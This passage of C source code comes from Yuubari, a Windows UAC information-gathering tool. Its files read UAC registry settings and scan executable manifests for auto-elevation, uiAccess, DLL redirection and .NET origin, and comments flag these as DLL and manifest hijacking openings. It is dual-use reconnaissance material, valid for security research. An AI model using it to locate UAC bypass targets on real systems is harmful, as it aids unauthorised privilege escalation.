OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList); ================================================ FILE: Source/Yuubari/consts.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2017 - 2026 * * TITLE: CONSTS.H * * VERSION: 1.61 * * DATE: 12 Feb 2026 * * Global consts definition file. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
* *******************************************************************************/ #pragma once #define YUUBARI_MIN_SUPPORTED_NT_BUILD NT_WIN7_RTM #define YUUBARI_MAX_SUPPORTED_NT_BUILD NT_WIN11_24H2 #define T_UAC_COM_AUTOAPPROVAL_LIST TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UAC\\COMAutoApprovalList") //RS1+ #define T_UAC_BROKER_APPROVAL_LIST TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CloudExperienceHost\\Broker\\ElevatedClsids") #define T_UAC_SETTINGS_KEY TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") #define T_UAC_PROMPT_BEHAVIOR TEXT("ConsentPromptBehaviorAdmin") #define T_UAC_SECURE_DESKTOP TEXT("PromptOnSecureDesktop") #define T_UAC_RESTRICTED_AUTOAPPROVE TEXT("EnableRestrictedAutoApprove") //RS1+ #define T_UAC_AUTOAPPROVEIC TEXT("EnableAutoApproveIntegrityContinuity") //RS2+, AipAutoApproveHardeningPolicy #define T_UAC_AUTOAPPROVEMP TEXT("AutoApproveMitigationPolicy") //RS2+, AipAutoApproveHardeningPolicy #define T_UAC_AUTOAPPROVEHARDCLAIMS TEXT("AutoApproveHardeningClaims") //RS2+, AipMarkAutoApprovedToken(TokenSecurityAttributes) #define T_UAC_ENABLESECUREUIPATHS TEXT("EnableSecureUIAPaths") //RS2+, Only elevate UIAccess applications that are installed in secure locations #define T_FLAG_ELEVATION_ENABLED TEXT("ElevationEnabled") #define T_FLAG_VIRTUALIZATION_ENABLED TEXT("VirtualizationEnabled") #define T_FLAG_INSTALLERDETECT_ENABLED TEXT("InstallerDetectEnabled") #define T_PROGRAM_NAME TEXT("Yuubari") #define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.6.1 (Feb 12, 2026)\r\n") #define T_HELP TEXT("Optional parameters to execute: \r\n\n\ YUUBARI [/v] \r\n\n\ /v - produce verbose output.") #define T_SPLIT TEXT("===============================================================") #define T_BASIC_HEAD TEXT("\r\n[UacView] Basic UAC settings\r\n") #define T_COM_HEAD TEXT("\r\n[UacView] Autoelevated COM objects\r\n") #define T_COM_APPROVE_HEAD TEXT("\r\n[UacView] COMAutoApproval list\r\n") 
#define T_BROKER_APPROVE_HEAD TEXT("\r\n[UacView] Broker approval list\r\n") #define T_WINFILES_HEAD TEXT("\r\n[UacView] Autoelevated applications in Windows directory\r\n") #define T_PFDIRFILES_HEAD TEXT("\r\n[UacView] Autoelevated applications in Program Files directory\r\n") #define T_APPINFO_HEAD TEXT("\r\n[UacView] Appinfo data\r\n") ================================================ FILE: Source/Yuubari/cui.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2016 - 2025 * * TITLE: CUI.C * * VERSION: 1.60 * * DATE: 17 Jun 2025 * * Console output. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" HANDLE g_ConOut = NULL, g_ConIn = NULL; BOOL g_ConsoleOutput = FALSE; WCHAR g_BE = 0xFEFF; const SIZE_T MAX_CONSOLE_OUTPUT = 4096; /* * cuiInitialize * * Purpose: * * Initialize console input/output. 
* */ VOID cuiInitialize( _In_ BOOL InitInput, _Out_opt_ PBOOL IsConsoleOutput ) { ULONG dummy; g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); if (g_ConOut == INVALID_HANDLE_VALUE || g_ConOut == NULL) { g_ConOut = GetStdHandle(STD_ERROR_HANDLE); } if (InitInput) { g_ConIn = GetStdHandle(STD_INPUT_HANDLE); if (g_ConIn == INVALID_HANDLE_VALUE) { g_ConIn = NULL; } } g_ConsoleOutput = TRUE; if (g_ConOut != INVALID_HANDLE_VALUE && g_ConOut != NULL) { SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); if (!GetConsoleMode(g_ConOut, &dummy)) { g_ConsoleOutput = FALSE; WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL); } } else { g_ConsoleOutput = FALSE; } if (IsConsoleOutput) *IsConsoleOutput = g_ConsoleOutput; return; } /* * cuiClrScr * * Purpose: * * Clear screen. * */ VOID cuiClrScr( VOID ) { COORD coordScreen; DWORD cCharsWritten; DWORD dwConSize; CONSOLE_SCREEN_BUFFER_INFO csbi; coordScreen.X = 0; coordScreen.Y = 0; if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi)) return; dwConSize = csbi.dwSize.X * csbi.dwSize.Y; if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '), dwConSize, coordScreen, &cCharsWritten)) return; if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi)) return; if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten)) return; SetConsoleCursorPosition(g_ConOut, coordScreen); } /* * cuiPrintTextA * * Purpose: * * Output text to the console or file. * ANSI version. 
* */ VOID cuiPrintTextA( _In_ LPSTR lpText, _In_ BOOL UseReturn ) { BOOL writeSuccess; DWORD bytesIO; SIZE_T consoleIO, bufferSize, copySize; LPSTR Buffer; if (lpText == NULL) return; consoleIO = _strlen_a(lpText); if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT) return; if (UseReturn) { bufferSize = consoleIO + 3; } else { bufferSize = consoleIO + 1; } if (bufferSize > MAX_CONSOLE_OUTPUT) return; Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize); if (Buffer) { copySize = min(bufferSize - 1, consoleIO); memcpy(Buffer, lpText, copySize); Buffer[copySize] = '\0'; if (UseReturn) _strcat_a(Buffer, "\r\n"); consoleIO = _strlen_a(Buffer); if (g_ConsoleOutput != FALSE) { writeSuccess = WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); } else { writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); } HeapFree(GetProcessHeap(), 0, Buffer); } } /* * cuiPrintTextW * * Purpose: * * Output text to the console or file. * UNICODE version. 
* */ VOID cuiPrintTextW( _In_ LPWSTR lpText, _In_ BOOL UseReturn ) { BOOL writeSuccess; DWORD bytesIO; SIZE_T consoleIO, bufferSize, copySize; LPWSTR Buffer; if (lpText == NULL) return; consoleIO = _strlen_w(lpText); if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT) return; if (UseReturn) { bufferSize = (consoleIO + 3) * sizeof(WCHAR); } else { bufferSize = (consoleIO + 1) * sizeof(WCHAR); } if (bufferSize > MAX_CONSOLE_OUTPUT * sizeof(WCHAR)) return; Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize); if (Buffer) { copySize = min(bufferSize / sizeof(WCHAR) - 1, consoleIO); memcpy(Buffer, lpText, copySize * sizeof(WCHAR)); Buffer[copySize] = L'\0'; if (UseReturn) _strcat_w(Buffer, TEXT("\r\n")); consoleIO = _strlen_w(Buffer); if (g_ConsoleOutput != FALSE) { writeSuccess = WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); } else { writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); } HeapFree(GetProcessHeap(), 0, Buffer); } } /* * cuiPrintTextLastErrorA * * Purpose: * * Output LastError translated code to the console or file. * ANSI version. * */ VOID cuiPrintTextLastErrorA( _In_ BOOL UseReturn ) { CHAR szTextBuffer[1024]; DWORD dwLastError = GetLastError(); RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer)); if (FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPSTR)&szTextBuffer, sizeof(szTextBuffer) - 64, NULL) == 0) { _strcpy_a(szTextBuffer, "Error code: "); itostr_a(dwLastError, _strend_a(szTextBuffer)); } cuiPrintTextA(szTextBuffer, UseReturn); } /* * cuiPrintTextLastErrorW * * Purpose: * * Output LastError translated code to the console or file. * UNICODE version. 
* */ VOID cuiPrintTextLastErrorW( _In_ BOOL UseReturn ) { WCHAR szTextBuffer[1024]; DWORD dwLastError = GetLastError(); RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer)); if (FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPWSTR)&szTextBuffer, (sizeof(szTextBuffer) / sizeof(WCHAR)) - 64, NULL) == 0) { _strcpy_w(szTextBuffer, TEXT("Error code: ")); itostr_w(dwLastError, _strend_w(szTextBuffer)); } cuiPrintTextW(szTextBuffer, UseReturn); } ================================================ FILE: Source/Yuubari/cui.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2016 - 2018 * * TITLE: CUI.H * * VERSION: 1.30 * * DATE: 01 Aug 2018 * * Common header file for console ui. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
* *******************************************************************************/ #pragma once VOID cuiInitialize( _In_ BOOL InitInput, _Out_opt_ PBOOL IsConsoleOutput ); #ifdef _UNICODE #define cuiPrintText cuiPrintTextW #define cuiPrintTextLastError cuiPrintTextLastErrorW #else #define cuiPrintText cuiPrintTextA #define cuiPrintTextLastError cuiPrintTextLastErrorA #endif VOID cuiPrintTextA( _In_ LPSTR lpText, _In_ BOOL UseReturn ); VOID cuiPrintTextW( _In_ LPWSTR lpText, _In_ BOOL UseReturn ); VOID cuiPrintTextLastErrorA( _In_ BOOL UseReturn ); VOID cuiPrintTextLastErrorW( _In_ BOOL UseReturn ); VOID cuiClrScr( VOID ); ================================================ FILE: Source/Yuubari/fusion.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2026 * * TITLE: FUSION.C * * VERSION: 1.61 * * DATE: 12 Feb 2026 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" ptrWTGetSignatureInfo WTGetSignatureInfo = NULL; /* * IsExemptedAutoApproveEXE * * Purpose: * * Check if the given file is Exempted AutoApprove EXE. 
* */ BOOLEAN IsExemptedAutoApproveEXE( _In_ LPWSTR lpFileName, _In_ HANDLE hFile) { SIGNATURE_INFO sigData; NTSTATUS status; LPWSTR lpName = _filename(lpFileName); if ((_strcmpi(lpName, L"sysprep.exe") == 0) || (_strcmpi(lpName, L"inetmgr.exe") == 0)) { RtlSecureZeroMemory(&sigData, sizeof(sigData)); sigData.cbSize = sizeof(sigData); status = WTGetSignatureInfo(lpFileName, hFile, SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED, &sigData, NULL, NULL); if (NT_SUCCESS(status)) return ((sigData.SignatureState == SIGNATURE_STATE_VALID) && (sigData.fOSBinary != FALSE)); } return FALSE; } /* * SxsGetTocHeaderFromActivationContext * * Purpose: * * Locate and return pointer to Toc header in activation context. * */ NTSTATUS SxsGetTocHeaderFromActivationContext( _In_ PACTIVATION_CONTEXT ActivationContext, _Out_ PACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader, _Out_opt_ PACTIVATION_CONTEXT_DATA* ActivationContextData ) { NTSTATUS result = STATUS_UNSUCCESSFUL; ACTIVATION_CONTEXT_DATA* ContextData = NULL; ACTIVATION_CONTEXT_DATA_TOC_HEADER* Header; WCHAR szLog[0x100]; if (ActivationContext == NULL) return STATUS_INVALID_PARAMETER_1; if (TocHeader == NULL) return STATUS_INVALID_PARAMETER_2; __try { do { RtlSecureZeroMemory(szLog, sizeof(szLog)); ContextData = ActivationContext->ActivationContextData; if (ContextData->Magic != ACTIVATION_CONTEXT_DATA_MAGIC) { wsprintf(szLog, TEXT("ActivationContext Magic = %lx invalid"), ContextData->Magic); break; } if ( (ContextData->HeaderSize != sizeof(ACTIVATION_CONTEXT_DATA)) || (ContextData->HeaderSize > ContextData->TotalSize) ) { wsprintf(szLog, TEXT("Unexpected data HeaderSize = %lu"), ContextData->HeaderSize); break; } if (ContextData->DefaultTocOffset > ContextData->TotalSize) { wsprintf(szLog, TEXT("Unexpected Toc offset %lx"), ContextData->DefaultTocOffset); break; } Header = (ACTIVATION_CONTEXT_DATA_TOC_HEADER*)(((LPBYTE)ContextData) + ContextData->DefaultTocOffset); if (Header->HeaderSize != 
sizeof(ACTIVATION_CONTEXT_DATA_TOC_HEADER)) { wsprintf(szLog, TEXT("Unexpected Toc HeaderSize %lu"), Header->HeaderSize); break; } if ((Header->FirstEntryOffset != 0) && (Header->EntryCount == 0)) { wsprintf(szLog, TEXT("Unexpected EntryCount %lu"), Header->EntryCount); break; } if ((Header->EntryCount > 0) && (Header->FirstEntryOffset == 0)) { wsprintf(szLog, TEXT("Unexpected Toc FirstEntryOffset %lu"), Header->FirstEntryOffset); break; } if (Header->FirstEntryOffset > ContextData->TotalSize) { wsprintf(szLog, TEXT("Toc FirstEntry offset = %lu invalid"), Header->FirstEntryOffset); break; } *TocHeader = Header; if (ActivationContextData != NULL) *ActivationContextData = ContextData; result = STATUS_SUCCESS; } while (FALSE); if (!NT_SUCCESS(result)) { OutputDebugString(szLog); return STATUS_SXS_CORRUPTION; } } __except (EXCEPTION_EXECUTE_HANDLER) { return STATUS_SXS_CORRUPTION; } return result; } /* * SxsAllocInitUnicodeString * * Purpose: * * Allocates a buffer, copies a UNICODE string from the specified offset and length * of a section header, and initializes a UNICODE_STRING structure. * */ NTSTATUS SxsAllocInitUnicodeString( _In_ LPVOID SectionHeader, _In_ SIZE_T Offset, _In_ SIZE_T Length, _Out_ UNICODE_STRING* Destination ) { WCHAR* Buffer; if (!Destination || !SectionHeader || !Length) return STATUS_INVALID_PARAMETER; // // Allocate memory for string with space for NULL-terminator. // Buffer = (WCHAR*)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Length + sizeof(UNICODE_NULL)); if (!Buffer) return STATUS_NO_MEMORY; __try { RtlCopyMemory( Buffer, (PBYTE)SectionHeader + Offset, Length ); RtlInitUnicodeString(Destination, Buffer); } __except (EXCEPTION_EXECUTE_HANDLER) { RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer); return STATUS_SXS_CORRUPTION; } return STATUS_SUCCESS; } /* * SxsGetStringSectionRedirectionDlls * * Purpose: * * Extracts redirection DLLs from a string section entry and populates a DLL redirection list. 
* */ NTSTATUS SxsGetStringSectionRedirectionDlls( _In_ ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader, _In_ ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry, _Inout_ PDLL_REDIRECTION_LIST DllList ) { ULONG SegmentIndex; NTSTATUS result = STATUS_SXS_KEY_NOT_FOUND, status; DLL_REDIRECTION_LIST_ENTRY* DllListEntry; ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT* DllPathSegment; ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION* DataDll; if (!DllList) return result; __try { DataDll = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION*)(((LPBYTE)SectionHeader) + StringEntry->Offset); if (!DataDll || !DataDll->PathSegmentOffset || DataDll->PathSegmentCount == 0) return result; DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*)(((LPBYTE)SectionHeader) + DataDll->PathSegmentOffset); for (SegmentIndex = 0; SegmentIndex < DataDll->PathSegmentCount; SegmentIndex++) { if (DllPathSegment && DllPathSegment->Length && DllPathSegment->Offset) { DllListEntry = (DLL_REDIRECTION_LIST_ENTRY*) RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof(DLL_REDIRECTION_LIST_ENTRY)); if (DllListEntry) { status = SxsAllocInitUnicodeString( SectionHeader, StringEntry->KeyOffset, StringEntry->KeyLength, &DllListEntry->KeyName); if (!NT_SUCCESS(status)) { RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry); if (status == STATUS_SXS_CORRUPTION) return status; continue; } status = SxsAllocInitUnicodeString( SectionHeader, DllPathSegment->Offset, DllPathSegment->Length, &DllListEntry->DllName); if (!NT_SUCCESS(status)) { RtlFreeUnicodeString(&DllListEntry->KeyName); RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry); if (status == STATUS_SXS_CORRUPTION) return status; continue; } RtlInterlockedPushEntrySList(&DllList->Header, &DllListEntry->ListEntry); } } DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*) (((LPBYTE)DllPathSegment) + sizeof(ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT)); } result = STATUS_SUCCESS; } 
__except (EXCEPTION_EXECUTE_HANDLER) { return STATUS_SXS_CORRUPTION; } return result; } /* * SxsGetDllRedirectionFromActivationContext * * Purpose: * * Query redirection dll list from activation context data. * */ NTSTATUS SxsGetDllRedirectionFromActivationContext( _In_ PACTIVATION_CONTEXT ActivationContext, _In_ PDLL_REDIRECTION_LIST DllList ) { ULONG i, j; NTSTATUS result = STATUS_UNSUCCESSFUL, status; ACTIVATION_CONTEXT_DATA* ContextData = NULL; ACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader = NULL; ACTIVATION_CONTEXT_DATA_TOC_ENTRY* TocEntry = NULL; ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader = NULL; ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry = NULL; WCHAR szLog[0x100]; __try { if (ActivationContext == NULL) return STATUS_INVALID_PARAMETER_1; if (DllList == NULL) return STATUS_INVALID_PARAMETER_2; do { if (!NT_SUCCESS(SxsGetTocHeaderFromActivationContext(ActivationContext, &TocHeader, &ContextData))) break; TocEntry = (ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)ContextData) + TocHeader->FirstEntryOffset); RtlInitializeSListHead(&DllList->Header); i = 1; while (i < TocHeader->EntryCount) { if (TocEntry->Format == ACTIVATION_CONTEXT_SECTION_FORMAT_STRING) { SectionHeader = (ACTIVATION_CONTEXT_STRING_SECTION_HEADER*)(((LPBYTE)ContextData) + TocEntry->Offset); if (SectionHeader->Magic != ACTIVATION_CONTEXT_STRING_SECTION_MAGIC) { wsprintf(szLog, TEXT("Section Magic = %lx invalid"), SectionHeader->Magic); OutputDebugString(szLog); break; } if (SectionHeader->HeaderSize != sizeof(ACTIVATION_CONTEXT_STRING_SECTION_HEADER)) { wsprintf(szLog, TEXT("Unexpected Section HeaderSize = %lu"), SectionHeader->HeaderSize); OutputDebugString(szLog); break; } if (TocEntry->Id == ACTIVATION_CONTEXT_SECTION_DLL_REDIRECTION) { StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)SectionHeader) + SectionHeader->ElementListOffset); status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList); if (status == STATUS_SXS_CORRUPTION) 
break; /* corrupted section: stop walking the TOC, a continue here would re-enter the loop with TocEntry and i unchanged and never terminate */ for (j = 1; j < SectionHeader->ElementCount; j++) { StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)StringEntry) + sizeof(ACTIVATION_CONTEXT_STRING_SECTION_ENTRY)); status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList); if (status == STATUS_SXS_CORRUPTION) break; } if (status == STATUS_SXS_CORRUPTION) break; /* same policy for corruption found deeper in the section */ } } TocEntry = (ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)TocEntry) + sizeof(ACTIVATION_CONTEXT_DATA_TOC_ENTRY)); i += 1; } /* while (i < TocHeader->EntryCount) */ DllList->Depth = RtlQueryDepthSList(&DllList->Header); result = (DllList->Depth == 0) ? STATUS_SXS_SECTION_NOT_FOUND : STATUS_SUCCESS; } while (FALSE); } __except (EXCEPTION_EXECUTE_HANDLER) { return STATUS_SXS_CORRUPTION; } return result; } /* * FusionProbeForRedirectedDlls * * Purpose: * * Probe activation context for redirection dlls and output them if found. * */ NTSTATUS FusionProbeForRedirectedDlls( _In_ LPWSTR lpFileName, _In_ ACTIVATION_CONTEXT* ActivationContext, _In_ OUTPUTCALLBACK OutputCallback ) { NTSTATUS status; SLIST_ENTRY* ListEntry = NULL; DLL_REDIRECTION_LIST_ENTRY* DllData = NULL; UAC_FUSION_DATA_DLL FusionRedirectedDll; DLL_REDIRECTION_LIST DllList; __try { RtlSecureZeroMemory(&DllList, sizeof(DllList)); status = SxsGetDllRedirectionFromActivationContext(ActivationContext, &DllList); if (NT_SUCCESS(status)) { while (DllList.Depth) { ListEntry = RtlInterlockedPopEntrySList(&DllList.Header); if (ListEntry) { DllData = (PDLL_REDIRECTION_ENTRY)ListEntry; RtlSecureZeroMemory(&FusionRedirectedDll, sizeof(FusionRedirectedDll)); FusionRedirectedDll.DataType = UacFusionDataRedirectedDllType; FusionRedirectedDll.FileName = lpFileName; FusionRedirectedDll.KeyName = DllData->KeyName.Buffer; FusionRedirectedDll.DllName = DllData->DllName.Buffer; OutputCallback((PVOID)&FusionRedirectedDll); RtlFreeUnicodeString(&DllData->DllName); RtlFreeUnicodeString(&DllData->KeyName); RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllData); } DllList.Depth--; }
RtlInterlockedFlushSList(&DllList.Header); } } __except (EXCEPTION_EXECUTE_HANDLER) { return STATUS_SXS_CORRUPTION; } return status; } /* * FusionCheckFile * * Purpose: * * Query file manifest data related to security. * */ VOID FusionCheckFile( _In_ LPWSTR lpDirectory, _In_ WIN32_FIND_DATA* fdata, _In_ OUTPUTCALLBACK OutputCallback ) { DWORD lastError; NTSTATUS status; HANDLE hFile = NULL, hSection = NULL, hActCtx = INVALID_HANDLE_VALUE; LPWSTR FileName = NULL, pt = NULL; PBYTE DllBase = NULL; SIZE_T DllVirtualSize, sz, l; OBJECT_ATTRIBUTES attr; UNICODE_STRING usFileName; IO_STATUS_BLOCK iosb; ULONG_PTR ResourceSize = 0; ULONG_PTR IdPath[3]; ACTCTX ctx; SIGNATURE_INFO sigData; UAC_FUSION_DATA FusionCommonData; ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION ctxrl; WCHAR szValue[100]; usFileName.Buffer = NULL; do { if ((lpDirectory == NULL) || (fdata == NULL)) break; if (fdata->dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) break; sz = (_strlen(lpDirectory) + _strlen(fdata->cFileName) + 2) * sizeof(WCHAR); // +2 for NULL and possible '\' sz = ALIGN_UP_BY(sz, PAGE_SIZE); FileName = (LPWSTR)VirtualAlloc(NULL, sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (FileName == NULL) break; pt = FileName; _strcpy(FileName, lpDirectory); l = _strlen(FileName); if (pt[l - 1] != L'\\') { pt[l] = L'\\'; pt[l + 1] = 0; } if (l + _strlen(fdata->cFileName) < sz / sizeof(WCHAR)) { _strcat(FileName, fdata->cFileName); } else { break; // Path too long, skip this file } if (RtlDosPathNameToNtPathName_U(FileName, &usFileName, NULL, NULL) == FALSE) break; InitializeObjectAttributes(&attr, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL); RtlSecureZeroMemory(&iosb, sizeof(iosb)); // // Open file and map it. 
// status = NtCreateFile(&hFile, SYNCHRONIZE | FILE_READ_DATA, &attr, &iosb, NULL, 0, FILE_SHARE_READ, FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); if (!NT_SUCCESS(status)) break; status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile); if (!NT_SUCCESS(status)) break; DllBase = NULL; DllVirtualSize = 0; status = NtMapViewOfSection(hSection, NtCurrentProcess(), (PVOID*)&DllBase, 0, 0, NULL, &DllVirtualSize, ViewUnmap, 0, PAGE_READONLY); if (!NT_SUCCESS(status)) break; RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData)); FusionCommonData.Name = FileName; // // Look for embedded manifest resource // IdPath[0] = (ULONG_PTR)RT_MANIFEST; IdPath[1] = (ULONG_PTR)CREATEPROCESS_MANIFEST_RESOURCE_ID; IdPath[2] = 0; status = LdrResSearchResource(DllBase, (ULONG_PTR*)&IdPath, 3, 0, (LPVOID*)&pt, (ULONG_PTR*)&ResourceSize, NULL, NULL); FusionCommonData.IsFusion = NT_SUCCESS(status); // // File has no manifest embedded. // if (FusionCommonData.IsFusion == FALSE) { switch (status) { case STATUS_RESOURCE_TYPE_NOT_FOUND: OutputDebugString(TEXT("LdrResSearchResource: resource type not found\r\n")); break; case STATUS_RESOURCE_DATA_NOT_FOUND: OutputDebugString(TEXT("LdrResSearchResource: resource data not found\r\n")); break; case STATUS_RESOURCE_NAME_NOT_FOUND: OutputDebugString(TEXT("LdrResSearchResource: resource name not found\r\n")); break; default: break; } // // No embedded manifest, possible manifest hijacking for versions below RS1 // if ( (status == STATUS_RESOURCE_TYPE_NOT_FOUND) || (status == STATUS_RESOURCE_DATA_NOT_FOUND) || (status == STATUS_RESOURCE_NAME_NOT_FOUND) ) { if (WTGetSignatureInfo != NULL) { // // Check if file is signed as part of an operation system // RtlSecureZeroMemory(&sigData, sizeof(sigData)); sigData.cbSize = sizeof(sigData); status = WTGetSignatureInfo(FileName, hFile, SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED, &sigData, NULL, NULL); if (NT_SUCCESS(status)) { if 
(sigData.fOSBinary != FALSE) { RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData)); FusionCommonData.Name = FileName; FusionCommonData.IsOSBinary = TRUE; // // Check if signature valid or trusted // FusionCommonData.IsSignatureValidOrTrusted = ((sigData.SignatureState == SIGNATURE_STATE_TRUSTED) || (sigData.SignatureState == SIGNATURE_STATE_VALID)); OutputCallback((PVOID)&FusionCommonData); } } } else { //WTGetSignatureInfo != NULL // // On Windows 7 this API is not available, just output result. // RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData)); FusionCommonData.Name = FileName; OutputCallback((PVOID)&FusionCommonData); } } //break the global loop break; } // // File has manifest, create activation context for it. // RtlSecureZeroMemory(&ctx, sizeof(ctx)); ctx.cbSize = sizeof(ACTCTX); ctx.dwFlags = ACTCTX_FLAG_RESOURCE_NAME_VALID | ACTCTX_FLAG_HMODULE_VALID; ctx.lpResourceName = CREATEPROCESS_MANIFEST_RESOURCE_ID; ctx.lpSource = FileName; ctx.hModule = (HMODULE)DllBase; hActCtx = CreateActCtx(&ctx); if (hActCtx == INVALID_HANDLE_VALUE) { lastError = GetLastError(); RtlSecureZeroMemory(szValue, sizeof(szValue)); _strcpy(szValue, TEXT("Unexpected activation context failure =")); ultostr(lastError, _strend(szValue)); _strcat(szValue, TEXT("\r\n")); OutputDebugString(szValue); break; } // // Query run level and uiAccess information. // RtlSecureZeroMemory(&ctxrl, sizeof(ctxrl)); status = RtlQueryInformationActivationContext(RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF, (PCACTIVATION_CONTEXT)hActCtx, NULL, RunlevelInformationInActivationContext, (PVOID)&ctxrl, sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION), NULL); if (NT_SUCCESS(status)) { RtlCopyMemory(&FusionCommonData.RunLevel, &ctxrl, sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION)); } // // DotNet application highly vulnerable for Dll Hijacking attacks. // Always check if file is DotNet origin. 
// FusionCommonData.IsDotNet = supIsCorImageFile(DllBase); // // Query autoelevate setting. // l = 0; RtlSecureZeroMemory(&szValue, sizeof(szValue)); status = RtlQueryActivationContextApplicationSettings(0, hActCtx, NULL, TEXT("autoElevate"), (PWSTR)&szValue, sizeof(szValue), &l); if (NT_SUCCESS(status)) { // // Actually appinfo only looks for 'T' or 't' symbol // for performance reasons perhaps // if (_strcmpi(szValue, TEXT("true")) == 0) FusionCommonData.AutoElevateState = AutoElevateEnabled; else // // Several former autoelevate applications has autoelevated strictly // disabled in manifest as part of their UAC fixes. // if (_strcmpi(szValue, TEXT("false")) == 0) FusionCommonData.AutoElevateState = AutoElevateDisabled; } else { // // Check specific "exempted" autoelevated files, they may not have "autoelevate" in manifest. // if (IsExemptedAutoApproveEXE(FileName, hFile)) { FusionCommonData.AutoElevateState = 